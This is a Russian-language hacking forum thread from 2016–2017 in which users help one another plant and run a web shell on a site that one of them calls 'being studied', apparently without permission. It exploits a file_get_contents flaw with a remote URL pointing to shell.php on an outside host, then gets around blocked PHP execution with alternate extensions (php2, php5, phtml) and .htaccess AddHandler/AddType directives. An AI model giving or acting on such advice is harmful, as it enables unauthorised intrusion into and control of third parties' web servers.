HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.04.2016, 10:07
user0
Guest
Сообщений: n/a
Провел на форуме:
2365

Репутация: 0
По умолчанию

На изучаемом сайте найдена уязвимость:

file_get_contents($_POST['n'])

можно ли как-то залить шел или выполнить sql запрос?

Спасибо.
 
Ответить с цитированием

  #2  
Старый 16.08.2016, 12:18
boool
Guest
Сообщений: n/a
Провел на форуме:
861

Репутация: 0
По умолчанию

Например вот так:

site/?n=http://exec.site/shell.php

в shell.php
 
Ответить с цитированием

  #3  
Старый 24.11.2017, 21:43
eastpearldxb
Guest
Сообщений: n/a
Провел на форуме:
1325

Репутация: 0
По умолчанию

Задил шелл, но тут проблемка. В папке где залит шелл, нельзя выполнять команды php, то есть файлы с расширением php нельзя запустить
 
Ответить с цитированием

  #4  
Старый 24.11.2017, 22:52
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

php2,php3,php5,phtml,shtml
 
Ответить с цитированием

  #5  
Старый 24.11.2017, 23:32
eastpearldxb
Guest
Сообщений: n/a
Провел на форуме:
1325

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:

php2,php3,php5,phtml,shtml
Не работает, может туда как нибудь .htaccess залить?
 
Ответить с цитированием

  #6  
Старый 24.11.2017, 23:34
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

ну если там есть .htaccess, то не зальешь, а в другую папку?
 
Ответить с цитированием

  #7  
Старый 25.11.2017, 11:44
eastpearldxb
Guest
Сообщений: n/a
Провел на форуме:
1325

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:

ну если там есть .htaccess, то не зальешь, а в другую папку?
Шел то залился, только он не запускуется,ьак как нельзя php файлы запускать. php2, php3 и тог далее тоже не помогает. Как еще можно запустить шелл?
 
Ответить с цитированием

  #8  
Старый 25.11.2017, 11:45
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

в другую папку пробуй залить шелл
 
Ответить с цитированием

  #9  
Старый 25.11.2017, 11:56
eastpearldxb
Guest
Сообщений: n/a
Провел на форуме:
1325

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:

в другую папку пробуй залить шелл
Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам
 
Ответить с цитированием

  #10  
Старый 25.11.2017, 14:01
gena ryzhov
Guest
Сообщений: n/a
Провел на форуме:
4684

Репутация: 0
По умолчанию

Цитата:
Сообщение от eastpearldxb  
eastpearldxb said:

Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам
В Гугле: addhandler htaccess

AddHandler application/x-httpd-php .расширение

AddType application/x-httpd-php .php . расширение
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ